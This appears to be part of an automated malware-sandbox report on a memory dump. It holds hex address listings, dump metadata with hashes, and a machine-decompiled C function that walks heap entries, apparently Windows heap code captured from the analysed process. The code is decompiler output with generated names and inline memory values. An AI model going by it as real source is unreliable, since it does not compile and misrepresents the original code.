                                                0x00901da3
                                                0x00901dba
                                                0x00901dba
                                                0x00901dbe
                                                0x00901dc2
                                                0x00901dc4
                                                0x00901dca
                                                0x00901dcd
                                                0x00901dd1
                                                0x00901dd1
                                                0x00000000
                                                0x00901dc4
                                                0x00901da9
                                                0x00901dac
                                                0x00901db0
                                                0x00901db4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00901db4
                                                0x00901d88
                                                0x00901d8b
                                                0x00901d8f
                                                0x00901d93
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00901d93
                                                0x00901d67
                                                0x00901d6a
                                                0x00901d6e
                                                0x00901d72
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00902355
                                                0x00900daa
                                                0x00900dae
                                                0x00900e2c
                                                0x00900e2e
                                                0x00900e30
                                                0x00000000
                                                0x00000000
                                                0x00900e3c
                                                0x00900ebc
                                                0x00900ebe
                                                0x00900ec0
                                                0x00000000
                                                0x00000000
                                                0x00900ecc
                                                0x00900f4c
                                                0x00900f4e
                                                0x00900f50
                                                0x00000000
                                                0x00000000
                                                0x00900f5c
                                                0x00900fdc
                                                0x00900fde
                                                0x00900fe0
                                                0x00000000
                                                0x00000000
                                                0x00900fec
                                                0x0090106c
                                                0x0090106e
                                                0x00901070
                                                0x00000000
                                                0x00000000
                                                0x0090107c
                                                0x009010fc
                                                0x009010fe
                                                0x00901100
                                                0x00000000
                                                0x00000000
                                                0x0090110c
                                                0x0090118c
                                                0x0090118e
                                                0x00901190
                                                0x00000000
                                                0x00000000
                                                0x0090119c
                                                0x0090121c
                                                0x0090121e
                                                0x00901220
                                                0x00000000
                                                0x00901226
                                                0x00901226
                                                0x00901228
                                                0x0090122a
                                                0x00000000
                                                0x0090122a
                                                0x00901220
                                                0x009011a6
                                                0x009011a8
                                                0x009011bf
                                                0x009011c7
                                                0x009011c9
                                                0x009011e0
                                                0x009011e8
                                                0x009011ea
                                                0x00901201
                                                0x00901209
                                                0x0090120b
                                                0x00901218
                                                0x00901218
                                                0x00000000
                                                0x0090120b
                                                0x009011f7
                                                0x009011fb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009011fb
                                                0x009011d6
                                                0x009011da
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009011da
                                                0x009011b5
                                                0x009011b9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009011b9
                                                0x00901116
                                                0x00901118
                                                0x0090112f
                                                0x00901137
                                                0x00901139
                                                0x00901150
                                                0x00901158
                                                0x0090115a
                                                0x00901171
                                                0x00901179
                                                0x0090117b
                                                0x00901188
                                                0x00901188
                                                0x00000000
                                                0x0090117b
                                                0x00901167
                                                0x0090116b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0090116b
                                                0x00901146
                                                0x0090114a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0090114a
                                                0x00901125
                                                0x00901129
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00901129
                                                0x00901086
                                                0x00901088
                                                0x0090109f
                                                0x009010a7
                                                0x009010a9
                                                0x009010c0
                                                0x009010c8
                                                0x009010ca
                                                0x009010e1
                                                0x009010e9
                                                0x009010eb
                                                0x009010f8
                                                0x009010f8
                                                0x00000000
                                                0x009010eb
                                                0x009010d7
                                                0x009010db
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009010db
                                                0x009010b6
                                                0x009010ba
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009010ba
                                                0x00901095
                                                0x00901099
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00901099
                                                0x00900ff6
                                                0x00900ff8
                                                0x0090100f
                                                0x00901017
                                                0x00901019
                                                0x00901030
                                                0x00901038
                                                0x0090103a
                                                0x00901051
                                                0x00901059
                                                0x0090105b
                                                0x00901068
                                                0x00901068
                                                0x00000000
                                                0x0090105b
                                                0x00901047
                                                0x0090104b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0090104b
                                                0x00901026
                                                0x0090102a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0090102a
                                                0x00901005
                                                0x00901009
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00901009
                                                0x00900f66
                                                0x00900f68
                                                0x00900f7f
                                                0x00900f87
                                                0x00900f89
                                                0x00900fa0
                                                0x00900fa8
                                                0x00900faa
                                                0x00900fc1
                                                0x00900fc9
                                                0x00900fcb
                                                0x00900fd8
                                                0x00900fd8
                                                0x00000000
                                                0x00900fcb
                                                0x00900fb7
                                                0x00900fbb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00900fbb
                                                0x00900f96
                                                0x00900f9a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00900f9a
                                                0x00900f75
                                                0x00900f79
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00900f79
                                                0x00900ed6
                                                0x00900ed8
                                                0x00900eef
                                                0x00900ef7
                                                0x00900ef9
                                                0x00900f10
                                                0x00900f18
                                                0x00900f1a
                                                0x00900f31
                                                0x00900f39
                                                0x00900f3b
                                                0x00900f48
                                                0x00900f48
                                                0x00000000
                                                0x00900f3b
                                                0x00900f27
                                                0x00900f2b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00900f2b
                                                0x00900f06
                                                0x00900f0a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00900f0a
                                                0x00900ee5
                                                0x00900ee9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00900ee9
                                                0x00900e46
                                                0x00900e48
                                                0x00900e5f
                                                0x00900e67
                                                0x00900e69
                                                0x00900e80
                                                0x00900e88
                                                0x00900e8a
                                                0x00900ea1
                                                0x00900ea9
                                                0x00900eab
                                                0x00900eb8
                                                0x00900eb8
                                                0x00000000
                                                0x00900eab
                                                0x00900e97
                                                0x00900e9b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00900e9b
                                                0x00900e76
                                                0x00900e7a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00900e7a
                                                0x00900e55
                                                0x00900e59
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00900e59
                                                0x00900db6
                                                0x00900db8
                                                0x00900dcf
                                                0x00900dd7
                                                0x00900dd9
                                                0x00900df0
                                                0x00900df8
                                                0x00900dfa
                                                0x00900e11
                                                0x00900e19
                                                0x00900e1b
                                                0x00900e28
                                                0x00900e28
                                                0x00000000
                                                0x00900e1b
                                                0x00900e07
                                                0x00900e0b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00900e0b
                                                0x00900de6
                                                0x00900dea
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00900dea
                                                0x00900dc5
                                                0x00900dc9
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e1b72ad9af81fda59d5a33acf9cd282a9c028bad1ddc4bbe4c70008b938ed9e4
                                                • Instruction ID: 5edc5bbea9c4c58df3f045c5adcf4d8c6ec968ad9ca9310218bdad58504f1078
                                                • Opcode Fuzzy Hash: e1b72ad9af81fda59d5a33acf9cd282a9c028bad1ddc4bbe4c70008b938ed9e4
                                                • Instruction Fuzzy Hash: 84029F33D497B74FCB754EB940E452A7AA45E01A9031F87E9DDC03F2D6C11ADD0A96E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0098DBDA, Relevance: .5, Instructions: 504COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 97%
                                                			E0098DBDA(void* __eax, void* __ecx, void* __edx, void* __esi, signed int _a4, signed int _a8, signed short _a12) {
				signed int _v8;
				short _v34;
				char _v40;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				intOrPtr _t245;
				signed char _t250;
				signed int _t251;
				signed int _t254;
				signed char _t258;
				signed short _t260;
				signed short _t265;
				signed char _t266;
				signed int _t267;
				intOrPtr _t268;
				signed int _t270;
				signed int _t272;
				signed char _t273;
				signed int _t274;
				signed short _t275;
				signed char _t276;
				unsigned int _t279;
				signed short _t280;
				signed int _t282;
				unsigned int _t284;
				signed short _t285;
				signed int _t288;
				signed char _t289;
				signed short _t290;
				signed int _t292;
				signed char _t293;
				signed short _t294;
				signed int _t296;
				signed short _t299;
				signed short _t309;
				signed short _t319;
				signed int _t322;
				signed int _t325;
				signed int _t327;
				signed int _t332;
				intOrPtr* _t334;
				intOrPtr _t335;
				signed int _t337;
				intOrPtr _t339;
				signed int _t341;
				signed int _t342;
				signed char _t344;
				signed char _t345;
				signed int _t346;
				signed int _t347;
				signed int _t349;
				signed short _t359;
				signed char _t360;
				intOrPtr _t366;
				signed short _t367;
				signed int _t370;
				intOrPtr _t376;
				signed int _t377;
				signed short _t378;
				intOrPtr _t379;
				signed short _t380;
				signed short _t381;
				signed short _t390;
				signed int _t393;
				signed int* _t398;
				void* _t400;
				unsigned int _t402;

				_t400 = __esi;
				_t342 = _a4;
				if(( *(_t342 + 0x44) & 0x01000000) != 0) {
					_push(_a8);
					_push(_t342);
					E0099E7BA();
					return __eax;
				}
				_t6 = _t342 + 0x40; // 0x8b98458b
				_t238 =  *_t6;
				_t398 = _a8;
				__eflags = _t238 & 0x61000000;
				if((_t238 & 0x61000000) == 0) {
					L6:
					_t239 =  *_t398;
					_a8 = _a8 & 0x00000000;
					_push(_t400);
					__eflags = _t239;
					if(_t239 != 0) {
						_t344 = _t398[2] & 0x0000ffff;
						__eflags = _t344 & 0x00000102;
						if((_t344 & 0x00000102) == 0) {
							goto L18;
						}
						__eflags = _a12;
						if(_a12 == 0) {
							L12:
							_t402 = _t398[1] + _t239;
							__eflags = _t344 & 0x00000100;
							if((_t344 & 0x00000100) != 0) {
								__eflags = _t239 + 0xffffffe8;
								_t239 = E0098DB62(_t342, _t239 + 0xffffffe8);
							}
							__eflags = _a12;
							if(_a12 == 0) {
								L16:
								_t339 =  *((intOrPtr*)(_t239 + 0x10));
								_t27 = _t342 + 0xa8; // 0x98e95f
								__eflags = _t339 - _t27;
								if(_t339 == _t27) {
									goto L56;
								} else {
									_t332 = _t339 + 0xfffffff0;
									goto L57;
								}
							}
							__eflags = _t402 -  *((intOrPtr*)(_t239 + 0x28));
							if(_t402 <  *((intOrPtr*)(_t239 + 0x28))) {
								goto L72;
							}
							goto L16;
						}
						__eflags = _t344 & 0x00000002;
						if((_t344 & 0x00000002) == 0) {
							goto L12;
						} else {
							_t402 =  *(_t239 + 0x24);
							goto L72;
						}
					} else {
						_t332 = _t342;
						L57:
						_t402 = 0;
						__eflags = _t332;
						if(_t332 != 0) {
							 *_t398 = _t332;
							__eflags =  *(_t342 + 0x4c);
							if( *(_t342 + 0x4c) == 0) {
								_t367 =  *_t332 & 0x0000ffff;
							} else {
								_t378 =  *_t332;
								__eflags =  *(_t342 + 0x4c) & _t378;
								if(( *(_t342 + 0x4c) & _t378) != 0) {
									_t71 = _t342 + 0x50; // 0xb0458dc0
									_t378 = _t378 ^  *_t71;
									__eflags = _t378;
								}
								_t367 = _t378 & 0x0000ffff;
							}
							_t398[1] = (_t367 & 0x0000ffff) << 3;
							_t398[2] = 0;
							_t398[2] = 0;
							_t370 = 2;
							_t398[2] = _t370;
							_t398[3] =  *((intOrPtr*)(_t332 + 0x20)) -  *(_t332 + 0x2c) << 0xc;
							_t398[4] =  *(_t332 + 0x2c) << 0xc;
							_t376 =  *((intOrPtr*)(_t332 + 0x24));
							__eflags =  *(_t376 + 2) & 0x00000001;
							if(( *(_t376 + 2) & 0x00000001) == 0) {
								_t377 = _t376 + 0x10;
								__eflags = _t377;
							} else {
								_t377 = _t376 + 8;
							}
							_t398[5] = _t377;
							_t398[6] =  *(_t332 + 0x28);
							L72:
							__eflags = _t402;
							if(_t402 == 0) {
								L165:
								__eflags =  *0x7ffe0380;
								if( *0x7ffe0380 != 0) {
									_t245 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
									__eflags =  *(_t245 + 0x240) & 0x00000001;
									if(( *(_t245 + 0x240) & 0x00000001) != 0) {
										_v34 = 0x102e;
										_push( &_v40);
										_v8 = _t342;
										_push(4);
										_push(0x402);
										E008F01A4( *0x7ffe0380 & 0x000000ff);
									}
								}
								L168:
								_t243 = _a8;
								goto L169;
							}
							_t96 = _t402 + 7; // 0x53018b08
							_t250 =  *_t96;
							__eflags = _t250 & 0x00000040;
							if((_t250 & 0x00000040) == 0) {
								__eflags = _t250 - 4;
								if(_t250 != 4) {
									_t103 = _t402 + 8; // 0x98ed34
									_t251 = _t103;
									L79:
									 *_t398 = _t251;
									_t398[2] = 1;
									__eflags =  *((char*)(_t342 + 0xda)) - 2;
									if( *((char*)(_t342 + 0xda)) != 2) {
										_t254 = 0;
										__eflags = 0;
									} else {
										_t106 = _t342 + 0xd4; // 0xc0838c45
										_t254 =  *_t106;
									}
									__eflags = _t254;
									if(_t254 == 0) {
										L86:
										_t111 = _t342 + 0x4c; // 0x4589c803
										_t112 = _t342 + 0x52; // 0xc750b045
										_t113 = _t402 + 2; // 0x8bec8b55
										_t258 =  *_t111 >> 0x00000014 &  *_t112 ^  *_t113;
										__eflags = _t258 & 0x00000001;
										if((_t258 & 0x00000001) == 0) {
											_t216 = _t402 + 0x10; // 0x98ed3c
											 *_t398 = _t216;
											__eflags =  *(_t342 + 0x4c);
											if( *(_t342 + 0x4c) == 0) {
												_t260 =  *_t402 & 0x0000ffff;
											} else {
												_t265 =  *_t402;
												__eflags =  *(_t342 + 0x4c) & _t265;
												if(( *(_t342 + 0x4c) & _t265) != 0) {
													_t221 = _t342 + 0x50; // 0xb0458dc0
													_t265 = _t265 ^  *_t221;
													__eflags = _t265;
												}
												_t260 = _t265 & 0x0000ffff;
											}
											_t398[1] = (_t260 & 0x0000ffff) * 8 - 0x10;
											_t398[2] = 0x10;
											_t226 = _t402 + 6; // 0x18b084d
											_t398[2] =  *_t226;
											__eflags = 0;
											_t398[2] = 0;
											goto L165;
										}
										_t116 = _t402 + 7; // 0x53018b08
										_t266 =  *_t116;
										__eflags = _t266 & 0x00000040;
										if((_t266 & 0x00000040) == 0) {
											__eflags = _t266 - 4;
											if(_t266 != 4) {
												_t123 = _t402 + 8; // 0x98ed34
												_t267 = _t123;
												L93:
												 *_t398 = _t267;
												_t124 = _t402 + 7; // 0x53018b08
												_t268 =  *_t124;
												__eflags = _t268 - 4;
												if(_t268 == 4) {
													_t398[1] = E00985766(_t342, _t402);
													__eflags =  *(_t342 + 0x4c);
													if( *(_t342 + 0x4c) == 0) {
														_t270 =  *_t402 & 0x0000ffff;
													} else {
														_t285 =  *_t402;
														__eflags =  *(_t342 + 0x4c) & _t285;
														if(( *(_t342 + 0x4c) & _t285) != 0) {
															_t133 = _t342 + 0x50; // 0xb0458dc0
															_t285 = _t285 ^  *_t133;
															__eflags = _t285;
														}
														_t270 = _t285 & 0x0000ffff;
													}
													_t398[2] = _t270 + 0x20;
													_t398[2] = 0x40;
													_t272 = 0x401;
													L140:
													_t398[2] = _t272;
													__eflags =  *(_t342 + 0x4c);
													if( *(_t342 + 0x4c) == 0) {
														_t191 = _t402 + 2; // 0x8bec8b55
														_t273 =  *_t191;
													} else {
														_t284 =  *_t402;
														__eflags =  *(_t342 + 0x4c) & _t284;
														if(( *(_t342 + 0x4c) & _t284) != 0) {
															_t190 = _t342 + 0x50; // 0xb0458dc0
															_t284 = _t284 ^  *_t190;
															__eflags = _t284;
														}
														_t273 = _t284 >> 0x10;
													}
													__eflags = _t273 & 0x00000002;
													if((_t273 & 0x00000002) == 0) {
														_t274 = E00908131();
														__eflags = _t274 & 0x00000800;
														if((_t274 & 0x00000800) != 0) {
															_t206 = _t402 + 3; // 0x4d8bec8b
															_t275 =  *_t206 & 0x000000ff;
														} else {
															_t275 = 0;
														}
													} else {
														_t280 = E0098DB99(_t342, _t402);
														_a12 = _t280;
														_t398[3] =  *(_t280 + 4);
														_t398[4] =  *_t280;
														_t282 = E00908131();
														__eflags = _t282 & 0x00000800;
														if((_t282 & 0x00000800) != 0) {
															_t275 =  *((intOrPtr*)(_a12 + 2));
														} else {
															_t275 = 0;
														}
														_t398[2] = _t398[2] | 0x00000010;
													}
													_t398[4] = _t275;
													__eflags =  *(_t342 + 0x4c);
													if( *(_t342 + 0x4c) == 0) {
														_t213 = _t402 + 2; // 0x8bec8b55
														_t276 =  *_t213;
													} else {
														_t279 =  *_t402;
														__eflags =  *(_t342 + 0x4c) & _t279;
														if(( *(_t342 + 0x4c) & _t279) != 0) {
															_t212 = _t342 + 0x50; // 0xb0458dc0
															_t279 = _t279 ^  *_t212;
															__eflags = _t279;
														}
														_t276 = _t279 >> 0x10;
													}
													_t398[2] = _t398[2] | _t276 & 0xe0;
													goto L165;
												}
												__eflags = _t268 - 3;
												if(_t268 == 3) {
													_t136 = _t402 + 0x18; // 0x8f840f02
													 *_t398 =  *_t136;
													_t137 = _t402 + 0x1c; // 0x6a000001
													_t398[1] =  *_t137;
													_t398[2] = 0;
													_t398[2] = 0;
													_t272 = 0x100;
													goto L140;
												}
												__eflags = _t268 - 1;
												if(_t268 != 1) {
													_t141 = _t342 + 0x4c; // 0x4589c803
													_t349 =  *_t141;
													__eflags = _t349;
													if(_t349 == 0) {
														_t288 =  *_t402 & 0x0000ffff;
													} else {
														_t319 =  *_t402;
														_t142 = _t342 + 0x4c; // 0x4589c803
														_t349 =  *_t142;
														__eflags = _t349 & _t319;
														if((_t349 & _t319) != 0) {
															_t145 = _t342 + 0x50; // 0xb0458dc0
															_t319 = _t319 ^  *_t145;
															__eflags = _t319;
														}
														_t288 = _t319 & 0x0000ffff;
													}
													_a12 = _t288;
													_t147 = _t402 + 7; // 0x53018b08
													_t289 =  *_t147;
													__eflags = _t289 - 5;
													if(_t289 != 5) {
														__eflags = _t289 & 0x00000040;
														if((_t289 & 0x00000040) == 0) {
															__eflags = (_t289 & 0x0000003f) - 0x3f;
															if((_t289 & 0x0000003f) == 0x3f) {
																__eflags = _t289;
																if(_t289 >= 0) {
																	__eflags = _t349;
																	if(_t349 == 0) {
																		_t290 =  *_t402 & 0x0000ffff;
																	} else {
																		_t309 =  *_t402;
																		__eflags =  *(_t342 + 0x4c) & _t309;
																		if(( *(_t342 + 0x4c) & _t309) != 0) {
																			_t159 = _t342 + 0x50; // 0xb0458dc0
																			_t309 = _t309 ^  *_t159;
																			__eflags = _t309;
																		}
																		_t290 = _t309 & 0x0000ffff;
																	}
																} else {
																	_t155 = (_t402 >> 0x00000003 ^  *_t402 ^  *0x9d00a4 ^ _t342) + 0x10; // 0x1f1840f
																	_t290 =  *_t155;
																}
																_t161 = (_t290 & 0x0000ffff) * 8; // 0x90909090
																_t292 =  *(_t402 + _t161 - 4);
															} else {
																_t292 = _t289 & 0x3f;
															}
														} else {
															_t153 = (_t289 & 0x3f) * 8; // 0x84d8bec
															_t292 =  *(_t402 + _t153 + 4) & 0x0000ffff;
														}
													} else {
														_t148 = _t342 + 0x54; // 0xb045c750
														_t149 = _t402 + 4; // 0x84d8bec
														_t292 =  *_t148 & 0x0000ffff ^  *_t149 & 0x0000ffff;
													}
													_t398[1] = ((_a12 & 0x0000ffff) << 3) - _t292;
													_t165 = _t402 + 7; // 0x53018b08
													_t293 =  *_t165;
													__eflags = _t293 - 5;
													if(_t293 != 5) {
														__eflags = _t293 & 0x00000040;
														if((_t293 & 0x00000040) == 0) {
															__eflags = (_t293 & 0x0000003f) - 0x3f;
															if((_t293 & 0x0000003f) == 0x3f) {
																__eflags = _t293;
																if(_t293 >= 0) {
																	__eflags =  *(_t342 + 0x4c);
																	if( *(_t342 + 0x4c) == 0) {
																		_t294 =  *_t402 & 0x0000ffff;
																	} else {
																		_t299 =  *_t402;
																		__eflags =  *(_t342 + 0x4c) & _t299;
																		if(( *(_t342 + 0x4c) & _t299) != 0) {
																			_t178 = _t342 + 0x50; // 0xb0458dc0
																			_t299 = _t299 ^  *_t178;
																			__eflags = _t299;
																		}
																		_t294 = _t299 & 0x0000ffff;
																	}
																} else {
																	_t173 = (_t402 >> 0x00000003 ^  *_t402 ^  *0x9d00a4 ^ _t342) + 0x10; // 0x1f1840f
																	_t294 =  *_t173;
																}
																_t180 = (_t294 & 0x0000ffff) * 8; // 0x90909090
																_t296 =  *(_t402 + _t180 - 4);
															} else {
																_t296 = _t293 & 0x3f;
															}
														} else {
															_t171 = (_t293 & 0x3f) * 8; // 0x84d8bec
															_t296 =  *(_t402 + _t171 + 4) & 0x0000ffff;
														}
													} else {
														_t166 = _t342 + 0x54; // 0xb045c750
														_t167 = _t402 + 4; // 0x84d8bec
														_t296 =  *_t166 & 0x0000ffff ^  *_t167 & 0x0000ffff;
													}
													_t398[2] = _t296;
													_t183 = _t402 + 6; // 0x18b084d
													_t398[2] =  *_t183;
													_t272 = 1;
													__eflags = 1;
													goto L140;
												}
												_t398[2] = 1;
												goto L18;
											}
											_t122 = _t402 + 6; // 0x18b084d
											_t322 =  *_t122 & 0x000000ff;
											L89:
											_t120 = _t322 * 8; // 0x98ed34
											_t267 = _t402 + _t120 + 8;
											goto L93;
										}
										_t322 = _t266 & 0x3f;
										__eflags = _t322;
										goto L89;
									} else {
										_push( &_a8);
										_t325 = E009A2622(_t342, _t398);
										__eflags = _t325;
										if(_t325 == 0) {
											goto L86;
										}
										__eflags = _t398[2] & 0x00000200;
										if((_t398[2] & 0x00000200) == 0) {
											goto L168;
										}
										L18:
										__eflags =  *((char*)(_t342 + 0xda)) - 2;
										if( *((char*)(_t342 + 0xda)) != 2) {
											_t240 = 0;
											__eflags = 0;
										} else {
											_t29 = _t342 + 0xd4; // 0xc0838c45
											_t240 =  *_t29;
										}
										__eflags = _t240;
										if(_t240 == 0) {
											L24:
											__eflags = _t398[2] & 0x00000001;
											_t241 =  *_t398;
											if((_t398[2] & 0x00000001) == 0) {
												_t242 = _t241 - 0x10;
												__eflags =  *(_t342 + 0x4c);
												if( *(_t342 + 0x4c) == 0) {
													_t390 =  *_t242 & 0x0000ffff;
												} else {
													_t359 =  *_t242;
													__eflags =  *(_t342 + 0x4c) & _t359;
													if(( *(_t342 + 0x4c) & _t359) != 0) {
														_t55 = _t342 + 0x50; // 0xb0458dc0
														_t359 = _t359 ^  *_t55;
														__eflags = _t359;
													}
													_t390 = _t359 & 0x0000ffff;
												}
												_t345 =  *(_t242 + 6);
												__eflags = _t345;
												if(_t345 == 0) {
													_t346 = _t342;
												} else {
													_t346 = (_t242 & 0xffff0000) - ((_t345 & 0x000000ff) << 0x10) + 0x10000;
												}
												__eflags = _t346;
												if(_t346 == 0) {
													L98:
													_a8 = 0xc0000141;
													goto L165;
												} else {
													__eflags =  *((char*)(_t242 + 7)) - 3;
													if( *((char*)(_t242 + 7)) != 3) {
														_t347 = _t390 & 0x0000ffff;
														L71:
														_t402 = _t242 + _t347 * 8;
														goto L72;
													}
													L53:
													_t393 =  *(_t242 + 0x1c);
													_t61 = _t346 + 0x28; // 0xa8863ba8
													__eflags = _t393 + _t242 + 0x20 -  *_t61;
													if(_t393 + _t242 + 0x20 <  *_t61) {
														 *_t398 =  *(_t242 + 0x18);
														_t398[1] =  *(_t242 + 0x1c);
														_t398[2] = 0;
														_t398[2] = 0;
														_t398[2] = 0x100;
														_t402 = 0;
														goto L72;
													}
													_t62 = _t346 + 0x10; // 0x3558c0f
													_t366 =  *_t62;
													_t63 = _t342 + 0xa8; // 0x98e95f
													__eflags = _t366 - _t63;
													if(_t366 == _t63) {
														L56:
														_t332 = 0;
														__eflags = 0;
														goto L57;
													}
													_t64 = _t366 - 0x10; // 0x3558bff
													_t332 = _t64;
													goto L57;
												}
											}
											_t242 = _t241 - 8;
											__eflags =  *((char*)(_t242 + 7)) - 5;
											if( *((char*)(_t242 + 7)) == 5) {
												_t242 = _t242 - (( *(_t242 + 6) & 0x000000ff) << 3);
												__eflags = _t242;
											}
											__eflags =  *((char*)(_t242 + 7)) - 4;
											if( *((char*)(_t242 + 7)) != 4) {
												__eflags =  *(_t342 + 0x4c);
												if( *(_t342 + 0x4c) != 0) {
												}
												_t360 =  *(_t242 + 6);
												__eflags = _t360;
												if(_t360 == 0) {
													_t346 = _t342;
												} else {
													_t346 = (_t242 & 0xffff0000) - ((_t360 & 0x000000ff) << 0x10) + 0x10000;
												}
												__eflags = _t346;
												if(_t346 == 0) {
													goto L98;
												} else {
													__eflags =  *((char*)(_t242 + 7)) - 3;
													if( *((char*)(_t242 + 7)) == 3) {
														goto L53;
													}
													__eflags =  *(_t342 + 0x4c);
													if( *(_t342 + 0x4c) == 0) {
														_t380 =  *_t242 & 0x0000ffff;
													} else {
														_t381 =  *_t242;
														__eflags =  *(_t342 + 0x4c) & _t381;
														if(( *(_t342 + 0x4c) & _t381) != 0) {
															_t50 = _t342 + 0x50; // 0xb0458dc0
															_t381 = _t381 ^  *_t50;
															__eflags = _t381;
														}
														_t380 = _t381 & 0x0000ffff;
													}
													_t347 = _t380 & 0x0000ffff;
													goto L71;
												}
											} else {
												_t335 =  *((intOrPtr*)(_t242 - 0x18));
												_t41 = _t342 + 0xa0; // 0x98e957
												__eflags = _t335 - _t41;
												if(_t335 == _t41) {
													L97:
													_a8 = 0x8000001a;
													goto L165;
												}
												_t402 = _t335 + 0x18;
												goto L72;
											}
										} else {
											_push( &_a8);
											_t337 = E009A2622(_t342, _t398);
											__eflags = _t337;
											if(_t337 == 0) {
												goto L24;
											}
											__eflags = _t398[2] & 0x00000200;
											if((_t398[2] & 0x00000200) == 0) {
												goto L168;
											}
											goto L24;
										}
									}
								}
								_t102 = _t402 + 6; // 0x18b084d
								_t327 =  *_t102 & 0x000000ff;
								L75:
								_t100 = _t327 * 8; // 0x98ed34
								_t251 = _t402 + _t100 + 8;
								goto L79;
							}
							_t327 = _t250 & 0x3f;
							__eflags = _t327;
							goto L75;
						}
						_t65 = _t342 + 0xa0; // 0x98e957
						_t334 = _t65;
						_t379 =  *_t334;
						__eflags = _t379 - _t334;
						if(_t379 == _t334) {
							goto L97;
						}
						_t66 = _t379 + 0x18; // 0x3558c27
						_t402 = _t66;
						goto L72;
					}
				} else {
					__eflags = _t238 & 0x10000000;
					if(__eflags != 0) {
						goto L6;
					}
					_t341 = E009A21E1(_t342, __ecx, __edx, _t398, __esi, __eflags, _t342, _t398);
					__eflags = _t341;
					if(_t341 != 0) {
						goto L6;
					} else {
						_t243 = 0xc000000d;
						L169:
						return _t243;
					}
				}
			}













































































                                                0x0098dbda
                                                0x0098dbe3
                                                0x0098dbed
                                                0x0098dbef
                                                0x0098dbf2
                                                0x0098dbf3
                                                0x00000000
                                                0x0098dbf3
                                                0x0098dbfd
                                                0x0098dbfd
                                                0x0098dc01
                                                0x0098dc04
                                                0x0098dc09
                                                0x0098dc27
                                                0x0098dc27
                                                0x0098dc29
                                                0x0098dc2d
                                                0x0098dc2e
                                                0x0098dc30
                                                0x0098dc39
                                                0x0098dc3d
                                                0x0098dc43
                                                0x00000000
                                                0x00000000
                                                0x0098dc45
                                                0x0098dc49
                                                0x0098dc58
                                                0x0098dc5b
                                                0x0098dc5d
                                                0x0098dc63
                                                0x0098dc65
                                                0x0098dc6a
                                                0x0098dc6a
                                                0x0098dc6f
                                                0x0098dc73
                                                0x0098dc7e
                                                0x0098dc7e
                                                0x0098dc81
                                                0x0098dc87
                                                0x0098dc89
                                                0x00000000
                                                0x0098dc8f
                                                0x0098dc8f
                                                0x00000000
                                                0x0098dc8f
                                                0x0098dc89
                                                0x0098dc75
                                                0x0098dc78
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0098dc78
                                                0x0098dc4b
                                                0x0098dc4e
                                                0x00000000
                                                0x0098dc50
                                                0x0098dc50
                                                0x00000000
                                                0x0098dc50
                                                0x0098dc32
                                                0x0098dc32
                                                0x0098ddd2
                                                0x0098ddd2
                                                0x0098ddd4
                                                0x0098ddd6
                                                0x0098ddf0
                                                0x0098ddf2
                                                0x0098ddf5
                                                0x0098de06
                                                0x0098ddf7
                                                0x0098ddf7
                                                0x0098ddf9
                                                0x0098ddfc
                                                0x0098ddfe
                                                0x0098ddfe
                                                0x0098ddfe
                                                0x0098ddfe
                                                0x0098de01
                                                0x0098de01
                                                0x0098de0f
                                                0x0098de12
                                                0x0098de18
                                                0x0098de1c
                                                0x0098de1d
                                                0x0098de2a
                                                0x0098de33
                                                0x0098de36
                                                0x0098de39
                                                0x0098de3d
                                                0x0098de44
                                                0x0098de44
                                                0x0098de3f
                                                0x0098de3f
                                                0x0098de3f
                                                0x0098de47
                                                0x0098de4d
                                                0x0098de78
                                                0x0098de78
                                                0x0098de7a
                                                0x0098e17e
                                                0x0098e17e
                                                0x0098e185
                                                0x0098e18d
                                                0x0098e190
                                                0x0098e197
                                                0x0098e19e
                                                0x0098e1a5
                                                0x0098e1a6
